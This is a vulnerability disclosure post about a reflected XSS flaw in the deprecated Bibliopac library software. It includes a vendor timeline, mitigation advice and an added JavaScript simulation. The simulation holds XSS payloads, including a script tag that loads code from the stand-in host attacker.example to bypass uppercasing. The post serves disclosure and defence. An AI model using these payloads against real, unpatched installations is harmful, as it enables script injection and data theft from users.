Good morning. Today I bring to attention an XSS vulnerability in a library management/inventory application, Bibliopac from Bibliosoft. This software is used mainly in Portugal by several entities, and it is somewhat old. What makes this vulnerability dangerous is the environment in which the affected installations are deployed.
Quick introduction to XSS attacks
In my research, I found on Google 176 results of this application running on several servers. The matter gets worse when we look at which institutions are running it: institutions related to education, city halls and even court-related bodies.
After discovering this vulnerability, I contacted the developer of this application. However, they stated that the software is deprecated and that no patch will be issued. Their website confirms that this is indeed an old software version and that a new product is available (I did not test the new product).
Despite that, the vulnerability still exists and can be exploited. The following URLs are prone to XSS:
Keep in mind that the value of the “db” parameter may differ between installations, since the application allows different databases to be installed.
If we look at the page source, we can see the * reflected unmodified in the page. Weaponizing the vulnerability, we can trigger an alert message to prove that it works. At the second injection point the input is capitalized before being reflected, so an inline payload such as alert(1) will not run (JavaScript identifiers are case-sensitive). To fully exploit that injection point we need to (for example) point a script tag at a script hosted at another location: HTML tag and attribute names are case-insensitive, and the script body itself is fetched unchanged.
An attacker can exploit this vulnerability against users of an affected installation to extract additional information from a client's website. If for any reason you need to keep this product exposed, mitigations need to be put in place to block this attack; since no vendor patch will be issued, that means filtering or encoding the vulnerable parameters in front of the application (for example at a reverse proxy or WAF) or restricting who can reach it. There may also be other injection points in the software, but that was not thoroughly tested.
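The following is an added example, not code from the original post or from Bibliosoft's product. It simulates the two reflection behaviours described above (a raw reflection and one that capitalizes the input) and checks which payloads still execute, then shows the output-encoding fix that a proxy or patched page would apply. The page template, the parameter handling and the host attacker.example are assumptions; the real application's page names and parameters are not reproduced here.

```javascript
// Added example (not Bibliopac's code). The templates and the attacker host
// are assumptions used only to illustrate the reflection behaviours.

// Stand-in for the first injection point: the value is echoed straight into HTML.
function reflectRaw(value) {
  return `<p>Results for: ${value}</p>`;
}

// Stand-in for the second injection point: the value is uppercased first.
function reflectUppercased(value) {
  return `<p>Results for: ${value.toUpperCase()}</p>`;
}

// Hardened variant: HTML-encode the value before inserting it into markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function reflectEscaped(value) {
  return `<p>Results for: ${escapeHtml(value)}</p>`;
}

// Pull inline <script> bodies and external src values out of rendered HTML.
// Tag and attribute matching is case-insensitive, as in a real HTML parser.
function extractScripts(html) {
  const inline = [];
  const external = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    if (src) external.push(src[1]);
    else inline.push(m[2]);
  }
  return { inline, external };
}

// Would an inline script body actually run? JavaScript identifiers are
// case-sensitive, so ALERT(1) throws a ReferenceError where alert(1) works.
function inlineRuns(body) {
  let fired = false;
  const fakeAlert = () => { fired = true; };
  try {
    new Function('alert', body)(fakeAlert);
  } catch (e) {
    return false;
  }
  return fired;
}

// Where an external script would be fetched from after uppercasing. The URL
// parser normalises scheme and host to lowercase (DNS is case-insensitive),
// but the path keeps its case, so the attacker must host the file at /X.JS
// or on a server that ignores path case.
function fetchTarget(html) {
  const { external } = extractScripts(html);
  if (external.length === 0) return null;
  const u = new URL(external[0]);
  return { host: u.host, pathname: u.pathname };
}

// Constructed payloads: one inline, one pointing at an assumed attacker host.
const INLINE_PAYLOAD = '<script>alert(1)</script>';
const EXTERNAL_PAYLOAD = '<script src="http://attacker.example/x.js"></script>';

function analyse() {
  return {
    rawInline: inlineRuns(extractScripts(reflectRaw(INLINE_PAYLOAD)).inline[0] || ''),
    upperInline: inlineRuns(extractScripts(reflectUppercased(INLINE_PAYLOAD)).inline[0] || ''),
    upperExternal: fetchTarget(reflectUppercased(EXTERNAL_PAYLOAD)),
    escapedScripts:
      extractScripts(reflectEscaped(INLINE_PAYLOAD)).inline.length +
      extractScripts(reflectEscaped(EXTERNAL_PAYLOAD)).external.length,
  };
}

console.log(analyse());
```

Running it shows the inline payload firing at the raw injection point, failing at the capitalized one, the external script still resolving to attacker.example (with an uppercased path), and no script tags surviving once the value is HTML-encoded.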
- 27/08/2018 - First contact, requesting the company's security contact
- 28/08/2018 - First response
- 31/08/2018 - Details sent
- 31/08/2018 - Response: product deprecated 5 years ago, won't fix
- 31/08/2018 - Query to find out whether clients are going to be notified
- 22/10/2018 - No response; contacted CSIRT
- XX/12/2018 - Won't fix; clients being informed
- 01/02/2019 - Public disclosure
I do not promote the exploitation of this vulnerability for malicious purposes. My research was purely academic, without interference with or harm to anyone.